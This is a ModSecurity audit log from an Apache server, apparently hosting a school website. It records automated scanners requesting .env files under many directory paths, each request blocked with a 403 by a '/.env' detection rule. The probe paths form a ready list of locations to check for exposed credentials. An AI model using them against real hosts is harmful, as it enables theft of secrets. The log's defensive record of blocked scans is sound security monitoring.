1745132667483317 820 (- - -) Stopwatch2: 1745132667483317 820; combined=312, p1=269, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d1654e-Z-- --0f4dc853-A-- [20/Apr/2025:14:04:29 +0700] aAScfUAzeWrUIk0gvAu-swAAANM 103.236.140.4 43950 103.236.140.4 8181 --0f4dc853-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; TECNO W2 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 OPR/19.0.2254.108926 --0f4dc853-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f4dc853-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132669299018 817 (- - -) Stopwatch2: 1745132669299018 817; combined=335, p1=294, p2=0, p3=0, p4=0, p5=40, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f4dc853-Z-- --b9f6cb17-A-- [20/Apr/2025:14:04:30 +0700] aAScflTf0pL9EQC7JDWtcQAAAEA 103.236.140.4 43956 103.236.140.4 8181 --b9f6cb17-B-- GET /demo/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB7.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; AskTbORJ/5.15.15.36191) --b9f6cb17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9f6cb17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132670044999 793 (- - -) Stopwatch2: 1745132670044999 793; combined=310, p1=272, p2=0, p3=0, p4=0, p5=37, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9f6cb17-Z-- --0df17033-A-- [20/Apr/2025:14:04:34 +0700] aAScgsTCDeBrh52UaHRfMgAAAI0 103.236.140.4 43980 103.236.140.4 8181 --0df17033-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe --0df17033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df17033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132674216370 833 (- - -) Stopwatch2: 1745132674216370 833; combined=353, p1=318, p2=0, p3=0, p4=0, p5=34, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df17033-Z-- --121ed830-A-- [20/Apr/2025:14:06:17 +0700] aASc6VTf0pL9EQC7JDWuNAAAAE0 103.236.140.4 45784 103.236.140.4 8181 --121ed830-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --121ed830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --121ed830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132777123455 793 (- - -) Stopwatch2: 1745132777123455 793; combined=317, p1=264, p2=0, p3=0, p4=0, p5=53, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --121ed830-Z-- --afc0eb2e-A-- [20/Apr/2025:14:53:09 +0700] aASn5Vu16wJWB6g0mU-nKAAAABU 103.236.140.4 44222 103.236.140.4 8181 --afc0eb2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.36.26 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.36.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afc0eb2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afc0eb2e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745135589668886 778 (- - -) Stopwatch2: 1745135589668886 778; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afc0eb2e-Z-- --544b3f4d-A-- [20/Apr/2025:16:36:37 +0700] aATAJUAzeWrUIk0gvAvP_AAAAMI 103.236.140.4 39970 103.236.140.4 8181 --544b3f4d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --544b3f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --544b3f4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745141797529608 830 (- - -) Stopwatch2: 1745141797529608 830; combined=322, p1=288, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --544b3f4d-Z-- --95908606-A-- [20/Apr/2025:17:29:46 +0700] aATMmkAzeWrUIk0gvAvhpgAAAMc 103.236.140.4 52462 103.236.140.4 8181 --95908606-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.63.48 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.63.48 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --95908606-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95908606-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745144986632321 815 (- - -) Stopwatch2: 1745144986632321 815; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95908606-Z-- --45ca4932-A-- [20/Apr/2025:18:29:38 +0700] aATaokAzeWrUIk0gvAsoagAAANI 103.236.140.4 53730 103.236.140.4 8181 --45ca4932-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.251.69.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.251.69.35 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --45ca4932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ca4932-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745148578049970 944 (- - -) Stopwatch2: 1745148578049970 944; combined=328, p1=290, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ca4932-Z-- --e9167a35-A-- [20/Apr/2025:19:03:24 +0700] aATijEAzeWrUIk0gvAsqrQAAAM0 103.236.140.4 33366 103.236.140.4 8181 --e9167a35-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 45.148.10.172 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept-Charset: utf-8 --e9167a35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9167a35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745150604083409 915 (- - -) Stopwatch2: 1745150604083409 915; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9167a35-Z-- --bd910574-A-- [20/Apr/2025:19:23:57 +0700] aATnXUAzeWrUIk0gvAsrxQAAANM 103.236.140.4 38038 103.236.140.4 8181 --bd910574-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 Accept-Charset: utf-8 --bd910574-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd910574-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151837882191 777 (- - -) Stopwatch2: 1745151837882191 777; combined=365, p1=329, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd910574-Z-- --3409616e-A-- [20/Apr/2025:19:25:00 +0700] aATnnEAzeWrUIk0gvAsrzAAAAM4 103.236.140.4 38276 103.236.140.4 8181 --3409616e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3409616e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3409616e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151900073685 842 (- - -) Stopwatch2: 1745151900073685 842; combined=301, p1=262, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3409616e-Z-- --74f78c65-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsrzwAAAM0 103.236.140.4 38284 103.236.140.4 8181 --74f78c65-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --74f78c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f78c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901081858 796 (- - -) Stopwatch2: 1745151901081858 796; combined=292, p1=262, p2=0, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f78c65-Z-- --fcef2361-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0AAAAMk 103.236.140.4 38286 103.236.140.4 8181 --fcef2361-B-- GET /lib/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fcef2361-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcef2361-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901152806 770 (- - -) Stopwatch2: 1745151901152806 770; combined=261, p1=216, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcef2361-Z-- --d704e45b-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0QAAAME 103.236.140.4 38288 103.236.140.4 8181 --d704e45b-B-- GET /lab/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d704e45b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d704e45b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901222956 925 (- - -) Stopwatch2: 1745151901222956 925; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d704e45b-Z-- --da3e2d6f-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RAAAAJM 103.236.140.4 38290 103.236.140.4 8181 --da3e2d6f-B-- GET /cronlab/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --da3e2d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da3e2d6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901293862 728 (- - -) Stopwatch2: 1745151901293862 728; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da3e2d6f-Z-- --029c9c00-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0gAAAMQ 103.236.140.4 38292 103.236.140.4 8181 --029c9c00-B-- GET /cron/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --029c9c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --029c9c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901364031 724 (- - -) Stopwatch2: 1745151901364031 724; combined=285, p1=251, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --029c9c00-Z-- --196d5474-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnAAAAAI 103.236.140.4 38294 103.236.140.4 8181 --196d5474-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --196d5474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --196d5474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901437375 656 (- - -) Stopwatch2: 1745151901437375 656; combined=221, p1=191, p2=0, p3=0, p4=0, p5=30, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --196d5474-Z-- --cc92217c-A-- [20/Apr/2025:19:25:01 +0700] aATnnUAzeWrUIk0gvAsr0wAAAMw 103.236.140.4 38296 103.236.140.4 8181 --cc92217c-B-- GET /core/app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cc92217c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc92217c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901520250 993 (- - -) Stopwatch2: 1745151901520250 993; combined=393, p1=350, p2=0, p3=0, p4=0, p5=43, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc92217c-Z-- --29f35d27-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnQAAABA 103.236.140.4 38298 103.236.140.4 8181 --29f35d27-B-- GET /core/Database/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --29f35d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29f35d27-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901595528 622 (- - -) Stopwatch2: 1745151901595528 622; combined=249, p1=217, p2=0, p3=0, p4=0, p5=31, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
